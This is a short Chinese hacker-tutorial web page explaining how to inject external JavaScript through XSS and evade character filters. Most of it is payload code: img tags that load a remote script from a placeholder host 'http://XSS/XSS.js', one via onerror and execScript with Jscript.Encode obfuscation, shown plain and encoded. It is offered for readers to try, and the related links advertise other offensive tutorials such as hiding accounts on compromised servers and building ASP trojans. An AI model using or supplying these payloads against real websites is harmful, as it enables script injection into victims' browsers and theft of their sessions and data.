手机
当前位置:查字典教程网 >网络安全 >黑客教程 >教你如何在XSS中再插JS
教你如何在XSS中再插JS
摘要:字符过滤怎么办?用Encode加密后就无敌了~未加密前:加密后:嘿嘿~刺激吧~再怎么用你自己实验吧,要正常使用还需要encodeURI处理一...

<img src="javascript:try{var s=document.createElement('script');s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){}"></img> 字符过滤怎么办?用Encode加密后就无敌了~ 未加密前:

<img src='#' XSS="try{var s=document.createElement('script');s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){}" onerror="execScript(decodeURI(this.XSS),'Jscript.Encode');" > 加密后:

<img src='#' XSS="#@~^bQAAAA==OMX`7lMP/{NK^Es UYcm.nmY As s xDcv/1DbwOBbIkRdD1xB4YO2=zzpjUzp?U N/vpNKmEs OR(W[Xcl22xN;4k^N`kbI81lDm4`nbP8XCcAAA==^#~@ " onerror="execScript(decodeURI(this.XSS),'Jscript.Encode');" > 嘿嘿~刺激吧~再怎么用你自己实验吧,要正常使用还需要encodeURI处理一次Encode加密后的代码

【教你如何在XSS中再插JS】相关文章:

教你如何用ISAPI_Rewrite做IIS防盗链

教你如何在肉鸡的Serv-u中建立安全且隐藏的帐号

全面剖析DDoS攻击 黑客常用攻击方式

十一个步骤让你了解黑客是如何一步步攻击我们的 防御措施

教你如何通过Radmin拿服务器

教你如何制作VB的P-Code调试器

教你如何通过Mysql弱口令得到系统权限

教你成为ASP木马高手

教你如何用非主流方式抓鸡(图)

教你如何使用Google黑掉Windows服务器

精品推荐
分类导航